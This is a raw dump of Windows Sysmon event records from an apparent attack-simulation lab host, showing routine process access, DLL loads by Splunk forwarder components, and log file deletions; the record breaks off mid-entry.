AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000098833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.327{326FD73D-A441-6294-EB00-000000005502}4800440C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.327{326FD73D-A441-6294-EB00-000000005502}4800440C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.327{326FD73D-A441-6294-EB00-000000005502}4800440C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000098830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}4800ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000098829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000098825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6FA254D2B15CF5E8A68646AE970AA4D,SHA256=6CAF83A4811BA3EB49FD225559519A8F6C532EA172535FE84BCD48A95D5DC4D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851328231F8132ABA9E3886311001F20,SHA256=92E5CDB1DEEB8B695C59C5C1690EEF85D1B0732CCFA6476772B84A17E410A8BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A6DE1F0EFA358ED3ED2CD62A6583E7,SHA256=2634E640C573F0B6E0C6BB9C180B5F5F6D844AA9CA50F30730A830157298CE17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.406{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.406{326FD73D-C0B7-6294-340B-000000005502}66086868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.390{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.390{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.249{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 